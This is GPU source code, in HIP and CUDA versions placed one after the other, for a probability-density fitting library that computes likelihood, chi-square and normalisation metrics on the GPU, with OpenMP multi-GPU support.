rawPdf *= normalisationFactors[par]; return rawPdf > 0 ? -LOG(rawPdf) : 0; } __device__ fptype calculateProb (fptype rawPdf, fptype* evtVal, unsigned int par) { // Return probability, ie normalised PDF value. return rawPdf * normalisationFactors[par]; } __device__ fptype calculateBinAvg (fptype rawPdf, fptype* evtVal, unsigned int par) { rawPdf *= normalisationFactors[par]; rawPdf *= evtVal[1]; // Bin volume // Log-likelihood of numEvents with expectation of exp is (-exp + numEvents*ln(exp) - ln(numEvents!)). // The last is constant, so we drop it; and then multiply by minus one to get the negative log-likelihood. if (rawPdf > 0) { fptype expEvents = functorConstants[0]*rawPdf; return (expEvents - evtVal[0]*log(expEvents)); } return 0; } __device__ fptype calculateBinWithError (fptype rawPdf, fptype* evtVal, unsigned int par) { // In this case interpret the rawPdf as just a number, not a number of events. // Do not divide by integral over phase space, do not multiply by bin volume, // and do not collect 200 dollars. evtVal should have the structure (bin entry, bin error). //printf("[%i, %i] ((%f - %f) / %f)^2 = %f\n", blockIdx.x, threadIdx.x, rawPdf, evtVal[0], evtVal[1], POW((rawPdf - evtVal[0]) / evtVal[1], 2)); rawPdf -= evtVal[0]; // Subtract observed value. rawPdf /= evtVal[1]; // Divide by error. rawPdf *= rawPdf; return rawPdf; } __device__ fptype calculateChisq (fptype rawPdf, fptype* evtVal, unsigned int par) { rawPdf *= normalisationFactors[par]; rawPdf *= evtVal[1]; // Bin volume return pow(rawPdf * functorConstants[0] - evtVal[0], 2) / (evtVal[0] > 1 ? evtVal[0] : 1); } __device__ device_metric_ptr ptr_to_Eval = calculateEval; __device__ device_metric_ptr ptr_to_NLL = calculateNLL; __device__ device_metric_ptr ptr_to_Prob = calculateProb; __device__ device_metric_ptr ptr_to_BinAvg = calculateBinAvg; __device__ device_metric_ptr ptr_to_BinWithError = calculateBinWithError; __device__ device_metric_ptr ptr_to_Chisq = calculateChisq; void* host_fcn_ptr = 0; void* getMetricPointer (std::string name) { #define CHOOSE_PTR(ptrname) if (name == #ptrname) hipMemcpyFromSymbol((void**) &host_fcn_ptr, ptrname, sizeof(void*)) host_fcn_ptr = 0; CHOOSE_PTR(ptr_to_Eval); CHOOSE_PTR(ptr_to_NLL); CHOOSE_PTR(ptr_to_Prob); CHOOSE_PTR(ptr_to_BinAvg); CHOOSE_PTR(ptr_to_BinWithError); CHOOSE_PTR(ptr_to_Chisq); assert(host_fcn_ptr); return host_fcn_ptr; #undef CHOOSE_PTR } ThrustPdfFunctor::ThrustPdfFunctor (Variable* x, std::string n) : FunctorBase(x, n) , logger(0) {} __host__ int ThrustPdfFunctor::findFunctionIdx (void* dev_functionPtr) { // Code specific to function-pointer implementation #ifdef OMP_ON int tid = omp_get_thread_num(); std::map<void*, int>::iterator localPos = functionAddressToDeviceIndexMap[tid].find(dev_functionPtr); // Use find instead of [] to avoid returning 0 if the index doesn't exist. if (localPos != functionAddressToDeviceIndexMap[tid].end()) { return (*localPos).second; } #else std::map<void*, int>::iterator localPos = functionAddressToDeviceIndexMap.find(dev_functionPtr); if (localPos != functionAddressToDeviceIndexMap.end()) { return (*localPos).second; } #endif int fIdx = num_device_functions; host_function_table[num_device_functions] = dev_functionPtr; #ifdef OMP_ON functionAddressToDeviceIndexMap[tid][dev_functionPtr] = num_device_functions; #else functionAddressToDeviceIndexMap[dev_functionPtr] = num_device_functions; #endif num_device_functions++; cutilSafeCall(hipMemcpyToSymbol(device_function_table, host_function_table, num_device_functions*sizeof(void*))); return fIdx; } __host__ void ThrustPdfFunctor::initialise (std::vector<unsigned int> pindices, void* dev_functionPtr) { if (!fitControl) setFitControl(new UnbinnedNllFit()); // MetricTaker must be created after FunctorBase initialisation is done. FunctorBase::initialiseIndices(pindices); functionIdx = findFunctionIdx(dev_functionPtr); setMetrics(); } __host__ void ThrustPdfFunctor::setDebugMask (int mask, bool setSpecific) const { cpuDebug = mask; hipMemcpyToSymbol(gpuDebug, &cpuDebug, sizeof(int), 0, hipMemcpyHostToDevice); if (setSpecific) hipMemcpyToSymbol(debugParamIndex, &parameters, sizeof(unsigned int), 0, hipMemcpyHostToDevice); } __host__ void ThrustPdfFunctor::setMetrics () { if (logger) delete logger; logger = new MetricTaker(this, getMetricPointer(fitControl->getMetric())); } __host__ double ThrustPdfFunctor::sumOfNll (int numVars) const { static thrust::plus<double> cudaPlus; thrust::constant_iterator<int> eventSize(numVars); thrust::constant_iterator<fptype*> arrayAddress(cudaDataArray); double dummy = 0; //if (host_callnumber >= 2) abortWithCudaPrintFlush(__FILE__, __LINE__, getName() + " debug abort", this); #ifdef OMP_ON unsigned int thFirstEntry, thLastEntry; int tid, nthreads; int j; tid = omp_get_thread_num(); nthreads = omp_get_num_threads(); thFirstEntry = tid*(numEntries)/nthreads; thLastEntry = (tid+1)*(numEntries)/nthreads; // std::cout << tid << ": " << numEntries << " " << thFirstEntry << " " << thLastEntry << std::endl; // std::cout << "Extended term: " << numVars << " " << numEntries << " " << numEvents << std::endl; thrust::counting_iterator<int> eventIndex(0); lognorms[tid] = thrust::transform_reduce(thrust::make_zip_iterator(thrust::make_tuple(eventIndex + thFirstEntry, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + thLastEntry, arrayAddress, eventSize)), *logger, dummy, cudaPlus); #pragma omp barrier if (tid == 0) { gLognorm = 0; for (j = 0; j < nthreads; j++) gLognorm += lognorms[j]; } #pragma omp barrier // std::cout << tid << ": Full NLL: " << ret << " " << gLognorm << " " << lognorm << std::endl; return gLognorm; #else thrust::counting_iterator<int> eventIndex(0); return thrust::transform_reduce(thrust::make_zip_iterator(thrust::make_tuple(eventIndex, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + numEntries, arrayAddress, eventSize)), *logger, dummy, cudaPlus); #endif } __host__ double ThrustPdfFunctor::calculateNLL () const { //if (cpuDebug & 1) std::cout << getName() << " entering calculateNLL" << std::endl; //int oldMask = cpuDebug; //if (0 == host_callnumber) setDebugMask(0, false); normalise(); //if ((0 == host_callnumber) && (1 == oldMask)) setDebugMask(1, false); /* if (cpuDebug & 1) { std::cout << "Norm factors: "; for (int i = 0; i < totalParams; ++i) std::cout << host_normalisation[i] << " "; std::cout << std::endl; } */ hipMemcpyToSymbol(normalisationFactors, host_normalisation, totalParams*sizeof(fptype), 0, hipMemcpyHostToDevice); hipDeviceSynchronize(); // Ensure normalisation integrals are finished int numVars = observables.size(); if (fitControl->binnedFit()) { numVars += 2; numVars *= -1; } fptype ret = sumOfNll(numVars); if (0 == ret) abortWithCudaPrintFlush(__FILE__, __LINE__, getName() + " zero NLL", this); //if (cpuDebug & 1) std::cout << "Full NLL " << host_callnumber << " : " << 2*ret << std::endl; //setDebugMask(0); //if ((cpuDebug & 1) && (host_callnumber >= 1)) abortWithCudaPrintFlush(__FILE__, __LINE__, getName() + " debug abort", this); return 2*ret; } __host__ void ThrustPdfFunctor::evaluateAtPoints (Variable* var, std::vector<fptype>& res) { // NB: This does not project correctly in multidimensional datasets, because all observables // other than 'var' will have, for every event, whatever value they happened to get set to last // time they were set. This is likely to be the value from the last event in whatever dataset // you were fitting to, but at any rate you don't get the probability-weighted integral over // the other observables. copyParams(); normalise(); hipMemcpyToSymbol(normalisationFactors, host_normalisation, totalParams*sizeof(fptype), 0, hipMemcpyHostToDevice); UnbinnedDataSet tempdata(observables); double step = (var->upperlimit - var->lowerlimit) / var->numbins; for (int i = 0; i < var->numbins; ++i) { var->value = var->lowerlimit + (i+0.5)*step; tempdata.addEvent(); } setData(&tempdata); thrust::counting_iterator<int> eventIndex(0); thrust::constant_iterator<int> eventSize(observables.size()); thrust::constant_iterator<fptype*> arrayAddress(cudaDataArray); thrust::device_vector<fptype> results(var->numbins); MetricTaker evalor(this, getMetricPointer("ptr_to_Eval")); #ifdef OMP_ON unsigned int thFirstEntry, thLastEntry; int tid, nthreads; tid = omp_get_thread_num(); nthreads = omp_get_num_threads(); // use var->numbins or numEntries here? thFirstEntry = tid*(var->numbins)/nthreads; thLastEntry = (tid+1)*(var->numbins)/nthreads; thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(eventIndex+thFirstEntry, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + thLastEntry, arrayAddress, eventSize)), results.begin()+thFirstEntry, evalor); #pragma omp barrier #else thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(eventIndex, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + numEntries, arrayAddress, eventSize)), results.begin(), evalor); #endif thrust::host_vector<fptype> h_results = results; res.clear(); res.resize(var->numbins); for (int i = 0; i < var->numbins; ++i) { res[i] = h_results[i] * host_normalisation[parameters]; } } __host__ void ThrustPdfFunctor::evaluateAtPoints (std::vector<fptype>& points) const { /* std::set<Variable*> vars; getParameters(vars); unsigned int maxIndex = 0; for (std::set<Variable*>::iterator i = vars.begin(); i != vars.end(); ++i) { if ((*i)->getIndex() < maxIndex) continue; maxIndex = (*i)->getIndex(); } std::vector<double> params; params.resize(maxIndex+1); for (std::set<Variable*>::iterator i = vars.begin(); i != vars.end(); ++i) { if (0 > (*i)->getIndex()) continue; params[(*i)->getIndex()] = (*i)->value; } copyParams(params); thrust::device_vector<fptype> d_vec = points; normalise(); hipMemcpyToSymbol(normalisationFactors, host_normalisation, totalParams*sizeof(fptype), 0, hipMemcpyHostToDevice); thrust::transform(d_vec.begin(), d_vec.end(), d_vec.begin(), *evalor); thrust::host_vector<fptype> h_vec = d_vec; for (unsigned int i = 0; i < points.size(); ++i) points[i] = h_vec[i]; */ } __host__ void ThrustPdfFunctor::scan (Variable* var, std::vector<fptype>& values) { fptype step = var->upperlimit; step -= var->lowerlimit; step /= var->numbins; values.clear(); for (fptype v = var->lowerlimit + 0.5*step; v < var->upperlimit; v += step) { var->value = v; copyParams(); fptype curr = calculateNLL(); values.push_back(curr); } } __host__ void ThrustPdfFunctor::setParameterConstantness (bool constant) { std::set<Variable*> pars; getParameters(pars); for (std::set<Variable*>::iterator p = pars.begin(); p != pars.end(); ++p) { (*p)->fixed = constant; } } __host__ fptype ThrustPdfFunctor::getValue () { // Returns the value of the PDF at a single point. // Execute redundantly in all threads for OpenMP multiGPU case copyParams(); normalise(); hipMemcpyToSymbol(normalisationFactors, host_normalisation, totalParams*sizeof(fptype), 0, hipMemcpyHostToDevice); UnbinnedDataSet point(observables); point.addEvent(); setData(&point); thrust::counting_iterator<int> eventIndex(0); thrust::constant_iterator<int> eventSize(observables.size()); thrust::constant_iterator<fptype*> arrayAddress(cudaDataArray); thrust::device_vector<fptype> results(1); MetricTaker evalor(this, getMetricPointer("ptr_to_Eval")); thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(eventIndex, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + 1, arrayAddress, eventSize)), results.begin(), evalor); return results[0]; } __host__ fptype ThrustPdfFunctor::normalise () const { //if (cpuDebug & 1) std::cout << "Normalising " << getName() << " " << hasAnalyticIntegral() << " " << normRanges << std::endl; if (!fitControl->metricIsPdf()) { host_normalisation[parameters] = 1.0; return 1.0; } fptype ret = 1; if (hasAnalyticIntegral()) { for (obsConstIter v = obsCBegin(); v != obsCEnd(); ++v) { // Loop goes only over observables of this PDF. //std::cout << "Analytically integrating " << getName() << " over " << (*v)->name << std::endl; ret *= integrate((*v)->lowerlimit, (*v)->upperlimit); } host_normalisation[parameters] = 1.0/ret; //if (cpuDebug & 1) std::cout << "Analytic integral of " << getName() << " is " << ret << std::endl; return ret; } int totalBins = 1; for (obsConstIter v = obsCBegin(); v != obsCEnd(); ++v) { ret *= ((*v)->upperlimit - (*v)->lowerlimit); totalBins *= (integrationBins > 0 ? integrationBins : (*v)->numbins); //if (cpuDebug & 1) std::cout << "Total bins " << totalBins << " due to " << (*v)->name << " " << integrationBins << " " << (*v)->numbins << std::endl; } ret /= totalBins; fptype dummy = 0; static thrust::plus<fptype> cudaPlus; thrust::constant_iterator<fptype*> arrayAddress(normRanges); thrust::constant_iterator<int> eventSize(observables.size()); thrust::counting_iterator<int> binIndex(0); #ifdef OMP_ON unsigned int thFirstBin, thLastBin; int tid, nthreads; int j; tid = omp_get_thread_num(); nthreads = omp_get_num_threads(); thFirstBin = tid*(totalBins)/nthreads; thLastBin = (tid+1)*(totalBins)/nthreads; //std::cout << "totalBins = " << totalBins << " thFirstBin = " << thFirstBin << " thLastBin = " << thLastBin << std::endl; sums[tid] = thrust::transform_reduce(thrust::make_zip_iterator(thrust::make_tuple(binIndex + thFirstBin, eventSize, arrayAddress)), thrust::make_zip_iterator(thrust::make_tuple(binIndex + thLastBin, eventSize, arrayAddress)), *logger, dummy, cudaPlus); hipDeviceSynchronize(); // Ensure logger is done #pragma omp barrier if (tid == 0) { gSum = 0; for (j=0; j<nthreads; j++) gSum += sums[j]; } // std::cout << tid << ": sum = " << sum << " gSum = " << gSum << std::endl; #pragma omp barrier if (isnan(gSum)) { abortWithCudaPrintFlush(__FILE__, __LINE__, getName() + " NaN in normalisation", this); } else if (0 == gSum) { abortWithCudaPrintFlush(__FILE__, __LINE__, "Zero in normalisation", this); } ret *= gSum; #else fptype sum = thrust::transform_reduce(thrust::make_zip_iterator(thrust::make_tuple(binIndex, eventSize, arrayAddress)), thrust::make_zip_iterator(thrust::make_tuple(binIndex + totalBins, eventSize, arrayAddress)), *logger, dummy, cudaPlus); if (isnan(sum)) { abortWithCudaPrintFlush(__FILE__, __LINE__, getName() + " NaN in normalisation", this); } else if (0 == sum) { abortWithCudaPrintFlush(__FILE__, __LINE__, "Zero in normalisation", this); } //if (cpuDebug & 1) std::cout << getName() << " integral is " << ret << " " << sum << " " << (ret*sum) << " " << (1.0/(ret*sum)) << std::endl; ret *= sum; #endif if (0 == ret) abortWithCudaPrintFlush(__FILE__, __LINE__, "Zero integral"); host_normalisation[parameters] = 1.0/ret; return (fptype) ret; } // Notice that operators are distinguished by the order of the operands, // and not otherwise! It's up to the user to make his tuples correctly. // Main operator: Calls the PDF to get a predicted value, then the metric // to get the goodness-of-prediction number which is returned to MINUIT. __device__ fptype MetricTaker::operator () (thrust::tuple<int, fptype*, int> t) const { int eventIndex = thrust::get<0>(t); int eventSize = thrust::get<2>(t); fptype* eventAddress = thrust::get<1>(t) + (eventIndex * abs(eventSize)); // Causes stack size to be statically undeterminable. fptype ret = (*(reinterpret_cast<device_function_ptr>(device_function_table[functionIdx])))(eventAddress, hipArray, paramIndices+parameters); // Notice assumption here! For unbinned fits the 'eventAddress' pointer won't be used // in the metric, so it doesn't matter what it is. For binned fits it is assumed that // the structure of the event is (obs1 obs2... binentry binvolume), so that the array // passed to the metric consists of (binentry binvolume); unless the data has // user-provided errors, in which case binvolume is replaced by binError. ret = (*(reinterpret_cast<device_metric_ptr>(device_function_table[metricIndex])))(ret, eventAddress + (abs(eventSize)-2), parameters); return ret; } // Operator for binned evaluation, no metric. // Used in normalisation. #define MAX_NUM_OBSERVABLES 5 __device__ fptype MetricTaker::operator () (thrust::tuple<int, int, fptype*> t) const { // Bin index, event size, base address [lower, upper, numbins] int evtSize = thrust::get<1>(t); assert(evtSize <= MAX_NUM_OBSERVABLES); int binNumber = thrust::get<0>(t); // Do not understand why this cannot be declared __shared__. Dynamically allocating shared memory is apparently complicated. //fptype* binCenters = (fptype*) malloc(evtSize * sizeof(fptype)); __shared__ fptype binCenters[1024*MAX_NUM_OBSERVABLES]; // To convert global bin number to (x,y,z...) coordinates: For each dimension, take the mod // with the number of bins in that dimension. Then divide by the number of bins, in effect // collapsing so the grid has one fewer dimension. Rinse and repeat. unsigned int* indices = paramIndices + parameters; for (int i = 0; i < evtSize; ++i) { fptype lowerBound = thrust::get<2>(t)[3*i+0]; fptype upperBound = thrust::get<2>(t)[3*i+1]; int numBins = (int) FLOOR(thrust::get<2>(t)[3*i+2] + 0.5); int localBin = binNumber % numBins; fptype x = upperBound - lowerBound; x /= numBins; x *= (localBin + 0.5); x += lowerBound; binCenters[indices[indices[0] + 2 + i]+threadIdx.x*MAX_NUM_OBSERVABLES] = x; binNumber /= numBins; //if (gpuDebug & 1) //if ((gpuDebug & 1) && (0 == threadIdx.x) && (0 == blockIdx.x)) //printf("[%i, %i] Bins: %i %i %i %f %f %f %f %i\n", blockIdx.x, threadIdx.x, binNumber, numBins, localBin, x, lowerBound, upperBound, thrust::get<2>(t)[3*i+2], indices[indices[0] + 2 + i]); //printf("Bins: %i %i %i %f %f\n", i, indices[indices[0] + 2 + i]+threadIdx.x*MAX_NUM_OBSERVABLES, indices[indices[0] + 2 + i], x, binCenters[threadIdx.x*MAX_NUM_OBSERVABLES]); } // Causes stack size to be statically undeterminable. fptype ret = (*(reinterpret_cast<device_function_ptr>(device_function_table[functionIdx])))(binCenters+threadIdx.x*MAX_NUM_OBSERVABLES, hipArray, indices); //if (gpuDebug & 1) printf("[%i, %i] Binned eval: %f %f\n", blockIdx.x, threadIdx.x, binCenters[threadIdx.x*4], ret); return ret; } __host__ void ThrustPdfFunctor::getCompProbsAtDataPoints (std::vector<std::vector<fptype> >& values) { //cpuDebug = 1; copyParams(); double overall = normalise(); hipMemcpyToSymbol(normalisationFactors, host_normalisation, totalParams*sizeof(fptype), 0, hipMemcpyHostToDevice); //setDebugMask(1); int numVars = observables.size(); if (fitControl->binnedFit()) { numVars += 2; numVars *= -1; } thrust::device_vector<fptype> results(numEntries); thrust::constant_iterator<int> eventSize(numVars); thrust::constant_iterator<fptype*> arrayAddress(cudaDataArray); thrust::counting_iterator<int> eventIndex(0); MetricTaker evalor(this, getMetricPointer("ptr_to_Prob")); thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(eventIndex, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + numEntries, arrayAddress, eventSize)), results.begin(), evalor); //setDebugMask(0); values.clear(); values.resize(components.size() + 1); thrust::host_vector<fptype> host_results = results; //std::cout << "Overall: " << overall << " " << host_normalisation[getParameterIndex()] << " " << host_results[0] << " " << numVars << " " << numEntries << " " << host_results.size() << std::endl; for (unsigned int i = 0; i < host_results.size(); ++i) { values[0].push_back(host_results[i]); } for (unsigned int i = 0; i < components.size(); ++i) { MetricTaker compevalor(components[i], getMetricPointer("ptr_to_Prob")); thrust::counting_iterator<int> ceventIndex(0); thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(ceventIndex, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(ceventIndex + numEntries, arrayAddress, eventSize)), results.begin(), compevalor); host_results = results; //std::cout << "Normalisation " << components[i]->getName() << ": " << host_results[0] << ", " << host_normalisation[components[i]->getParameterIndex()] << std::endl; for (unsigned int j = 0; j < host_results.size(); ++j) { values[1 + i].push_back(host_results[j]); } } } // still need to add OpenMP/multi-GPU code here __host__ void ThrustPdfFunctor::transformGrid (fptype* host_output) { generateNormRange(); //normalise(); int totalBins = 1; for (obsConstIter v = obsCBegin(); v != obsCEnd(); ++v) { totalBins *= (*v)->numbins; } thrust::constant_iterator<fptype*> arrayAddress(normRanges); thrust::constant_iterator<int> eventSize(observables.size()); thrust::counting_iterator<int> binIndex(0); thrust::device_vector<fptype> d_vec; d_vec.resize(totalBins); thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(binIndex, eventSize, arrayAddress)), thrust::make_zip_iterator(thrust::make_tuple(binIndex + totalBins, eventSize, arrayAddress)), d_vec.begin(), *logger); thrust::host_vector<fptype> h_vec = d_vec; for (unsigned int i = 0; i < totalBins; ++i) host_output[i] = h_vec[i]; } MetricTaker::MetricTaker (FunctorBase* dat, void* dev_functionPtr) : metricIndex(0) , functionIdx(dat->getFunctionIndex()) , parameters(dat->getParameterIndex()) { //std::cout << "MetricTaker constructor with " << functionIdx << std::endl; #ifdef OMP_ON int tid = omp_get_thread_num(); std::map<void*, int>::iterator localPos = functionAddressToDeviceIndexMap[tid].find(dev_functionPtr); // Use find instead of [] to avoid returning 0 if the index doesn't exist. if (localPos != functionAddressToDeviceIndexMap[tid].end()) { metricIndex = (*localPos).second; } #else std::map<void*, int>::iterator localPos = functionAddressToDeviceIndexMap.find(dev_functionPtr); if (localPos != functionAddressToDeviceIndexMap.end()) { metricIndex = (*localPos).second; } #endif else { metricIndex = num_device_functions; host_function_table[num_device_functions] = dev_functionPtr; #ifdef OMP_ON functionAddressToDeviceIndexMap[tid][dev_functionPtr] = num_device_functions; #else functionAddressToDeviceIndexMap[dev_functionPtr] = num_device_functions; #endif num_device_functions++; cutilSafeCall(hipMemcpyToSymbol(device_function_table, host_function_table, num_device_functions*sizeof(void*))); } } MetricTaker::MetricTaker (int fIdx, int pIdx) : metricIndex(0) , functionIdx(fIdx) , parameters(pIdx) { // This constructor should only be used for binned evaluation, ie for integrals. } __host__ void ThrustPdfFunctor::setFitControl (FitControl* const fc, bool takeOwnerShip) { for (unsigned int i = 0; i < components.size(); ++i) { components[i]->setFitControl(fc, false); } if ((fitControl) && (fitControl->getOwner() == this)) { delete fitControl; } fitControl = fc; if (takeOwnerShip) { fitControl->setOwner(this); } setMetrics(); } #include "FunctorBase.cu"
e82d1d33266c5e3b8b740e413f75b35ab8018ee4.cu
#include "../GlobalCudaDefines.hh" #include "ThrustPdfFunctor.hh" #include "thrust/sequence.h" #include "thrust/iterator/constant_iterator.h" //#ifdef CUDAPRINT #include "cuPrintf.cu" #include <fstream> //#endif // These variables are either function-pointer related (thus specific to this implementation) // or constrained to be in the CUDAglob translation unit by nvcc limitations; otherwise they // would be in FunctorBase. // Device-side, translation-unit constrained. __constant__ fptype cudaArray[maxParams]; // Holds device-side fit parameters. __constant__ unsigned int paramIndices[maxParams]; // Holds functor-specific indices into cudaArray. Also overloaded to hold integer constants (ie parameters that cannot vary.) __constant__ fptype functorConstants[maxParams]; // Holds non-integer constants. Notice that first entry is number of events. __constant__ fptype normalisationFactors[maxParams]; // For debugging __constant__ int callnumber; __constant__ int gpuDebug; __constant__ unsigned int debugParamIndex; __device__ int internalDebug1 = -1; __device__ int internalDebug2 = -1; __device__ int internalDebug3 = -1; int cpuDebug = 0; // Function-pointer related. __device__ void* device_function_table[200]; // Not clear why this cannot be __constant__, but it causes crashes to declare it so. void* host_function_table[200]; unsigned int num_device_functions = 0; #ifdef OMP_ON // Make functionAddressToDevideIndexMap and array of maps indexed by thread id since // I get the following compiler error if I try to make it threadprivate. // "functionAddressToDeviceIndexMap’ declared ‘threadprivate’ after first use" typedef std::map<void*, int> tMapType; tMapType functionAddressToDeviceIndexMap[MAX_THREADS]; #pragma omp threadprivate(host_function_table, num_device_functions) fptype gSum; fptype sums[MAX_THREADS]; double gLognorm; double lognorms[MAX_THREADS]; #else std::map<void*, int> functionAddressToDeviceIndexMap; #endif #define cutilSafeCall(err) __cudaSafeCall(err, __FILE__, __LINE__) // For use in debugging memory issues void printMemoryStatus (std::string file, int line) { size_t memfree = 0; size_t memtotal = 0; cudaDeviceSynchronize(); cudaMemGetInfo(&memfree, &memtotal); cudaDeviceSynchronize(); std::cout << "Memory status " << file << " " << line << " Free " << memfree << " Total " << memtotal << " Used " << (memtotal - memfree) << std::endl; } #include <execinfo.h> void* stackarray[10]; void abortWithCudaPrintFlush (std::string file, int line, std::string reason, const FunctorBase* pdf = 0) { #ifdef CUDAPRINT cudaPrintfDisplay(stdout, true); cudaPrintfEnd(); #endif std::cout << "Abort called from " << file << " line " << line << " due to " << reason << std::endl; if (pdf) { std::set<Variable*> pars; pdf->getParameters(pars); std::cout << "Parameters of " << pdf->getName() << " : \n"; for (std::set<Variable*>::iterator v = pars.begin(); v != pars.end(); ++v) { if (0 > (*v)->index) continue; std::cout << " " << (*v)->name << " (" << (*v)->index << ") :\t" << host_params[(*v)->index] << std::endl; } } std::cout << "Parameters (" << totalParams << ") :\n"; for (int i = 0; i < totalParams; ++i) { std::cout << host_params[i] << " "; } std::cout << std::endl; // get void* pointers for all entries on the stack size_t size = backtrace(stackarray, 10); // print out all the frames to stderr backtrace_symbols_fd(stackarray, size, 2); exit(1); } void __cudaSafeCall (cudaError err, const char* file, int line) { if (cudaSuccess != err) { std::cout << "Error code " << err << " (" << cudaGetErrorString(err) << ") at " << file << ", " << line << std::endl; exit(1); } } __device__ fptype calculateEval (fptype rawPdf, fptype* evtVal, unsigned int par) { // Just return the raw PDF value, for use in (eg) normalisation. return rawPdf; } __device__ fptype calculateNLL (fptype rawPdf, fptype* evtVal, unsigned int par) { //if ((10 > callnumber) && (threadIdx.x < 10) && (blockIdx.x == 0)) cuPrintf("calculateNll %i %f %f %f\n", callnumber, rawPdf, normalisationFactors[par], rawPdf*normalisationFactors[par]); rawPdf *= normalisationFactors[par]; return rawPdf > 0 ? -LOG(rawPdf) : 0; } __device__ fptype calculateProb (fptype rawPdf, fptype* evtVal, unsigned int par) { // Return probability, ie normalised PDF value. return rawPdf * normalisationFactors[par]; } __device__ fptype calculateBinAvg (fptype rawPdf, fptype* evtVal, unsigned int par) { rawPdf *= normalisationFactors[par]; rawPdf *= evtVal[1]; // Bin volume // Log-likelihood of numEvents with expectation of exp is (-exp + numEvents*ln(exp) - ln(numEvents!)). // The last is constant, so we drop it; and then multiply by minus one to get the negative log-likelihood. if (rawPdf > 0) { fptype expEvents = functorConstants[0]*rawPdf; return (expEvents - evtVal[0]*log(expEvents)); } return 0; } __device__ fptype calculateBinWithError (fptype rawPdf, fptype* evtVal, unsigned int par) { // In this case interpret the rawPdf as just a number, not a number of events. // Do not divide by integral over phase space, do not multiply by bin volume, // and do not collect 200 dollars. evtVal should have the structure (bin entry, bin error). //printf("[%i, %i] ((%f - %f) / %f)^2 = %f\n", blockIdx.x, threadIdx.x, rawPdf, evtVal[0], evtVal[1], POW((rawPdf - evtVal[0]) / evtVal[1], 2)); rawPdf -= evtVal[0]; // Subtract observed value. rawPdf /= evtVal[1]; // Divide by error. rawPdf *= rawPdf; return rawPdf; } __device__ fptype calculateChisq (fptype rawPdf, fptype* evtVal, unsigned int par) { rawPdf *= normalisationFactors[par]; rawPdf *= evtVal[1]; // Bin volume return pow(rawPdf * functorConstants[0] - evtVal[0], 2) / (evtVal[0] > 1 ? evtVal[0] : 1); } __device__ device_metric_ptr ptr_to_Eval = calculateEval; __device__ device_metric_ptr ptr_to_NLL = calculateNLL; __device__ device_metric_ptr ptr_to_Prob = calculateProb; __device__ device_metric_ptr ptr_to_BinAvg = calculateBinAvg; __device__ device_metric_ptr ptr_to_BinWithError = calculateBinWithError; __device__ device_metric_ptr ptr_to_Chisq = calculateChisq; void* host_fcn_ptr = 0; void* getMetricPointer (std::string name) { #define CHOOSE_PTR(ptrname) if (name == #ptrname) cudaMemcpyFromSymbol((void**) &host_fcn_ptr, ptrname, sizeof(void*)) host_fcn_ptr = 0; CHOOSE_PTR(ptr_to_Eval); CHOOSE_PTR(ptr_to_NLL); CHOOSE_PTR(ptr_to_Prob); CHOOSE_PTR(ptr_to_BinAvg); CHOOSE_PTR(ptr_to_BinWithError); CHOOSE_PTR(ptr_to_Chisq); assert(host_fcn_ptr); return host_fcn_ptr; #undef CHOOSE_PTR } ThrustPdfFunctor::ThrustPdfFunctor (Variable* x, std::string n) : FunctorBase(x, n) , logger(0) {} __host__ int ThrustPdfFunctor::findFunctionIdx (void* dev_functionPtr) { // Code specific to function-pointer implementation #ifdef OMP_ON int tid = omp_get_thread_num(); std::map<void*, int>::iterator localPos = functionAddressToDeviceIndexMap[tid].find(dev_functionPtr); // Use find instead of [] to avoid returning 0 if the index doesn't exist. if (localPos != functionAddressToDeviceIndexMap[tid].end()) { return (*localPos).second; } #else std::map<void*, int>::iterator localPos = functionAddressToDeviceIndexMap.find(dev_functionPtr); if (localPos != functionAddressToDeviceIndexMap.end()) { return (*localPos).second; } #endif int fIdx = num_device_functions; host_function_table[num_device_functions] = dev_functionPtr; #ifdef OMP_ON functionAddressToDeviceIndexMap[tid][dev_functionPtr] = num_device_functions; #else functionAddressToDeviceIndexMap[dev_functionPtr] = num_device_functions; #endif num_device_functions++; cutilSafeCall(cudaMemcpyToSymbol(device_function_table, host_function_table, num_device_functions*sizeof(void*))); return fIdx; } __host__ void ThrustPdfFunctor::initialise (std::vector<unsigned int> pindices, void* dev_functionPtr) { if (!fitControl) setFitControl(new UnbinnedNllFit()); // MetricTaker must be created after FunctorBase initialisation is done. FunctorBase::initialiseIndices(pindices); functionIdx = findFunctionIdx(dev_functionPtr); setMetrics(); } __host__ void ThrustPdfFunctor::setDebugMask (int mask, bool setSpecific) const { cpuDebug = mask; cudaMemcpyToSymbol(gpuDebug, &cpuDebug, sizeof(int), 0, cudaMemcpyHostToDevice); if (setSpecific) cudaMemcpyToSymbol(debugParamIndex, &parameters, sizeof(unsigned int), 0, cudaMemcpyHostToDevice); } __host__ void ThrustPdfFunctor::setMetrics () { if (logger) delete logger; logger = new MetricTaker(this, getMetricPointer(fitControl->getMetric())); } __host__ double ThrustPdfFunctor::sumOfNll (int numVars) const { static thrust::plus<double> cudaPlus; thrust::constant_iterator<int> eventSize(numVars); thrust::constant_iterator<fptype*> arrayAddress(cudaDataArray); double dummy = 0; //if (host_callnumber >= 2) abortWithCudaPrintFlush(__FILE__, __LINE__, getName() + " debug abort", this); #ifdef OMP_ON unsigned int thFirstEntry, thLastEntry; int tid, nthreads; int j; tid = omp_get_thread_num(); nthreads = omp_get_num_threads(); thFirstEntry = tid*(numEntries)/nthreads; thLastEntry = (tid+1)*(numEntries)/nthreads; // std::cout << tid << ": " << numEntries << " " << thFirstEntry << " " << thLastEntry << std::endl; // std::cout << "Extended term: " << numVars << " " << numEntries << " " << numEvents << std::endl; thrust::counting_iterator<int> eventIndex(0); lognorms[tid] = thrust::transform_reduce(thrust::make_zip_iterator(thrust::make_tuple(eventIndex + thFirstEntry, arrayAddress, eventSize)), 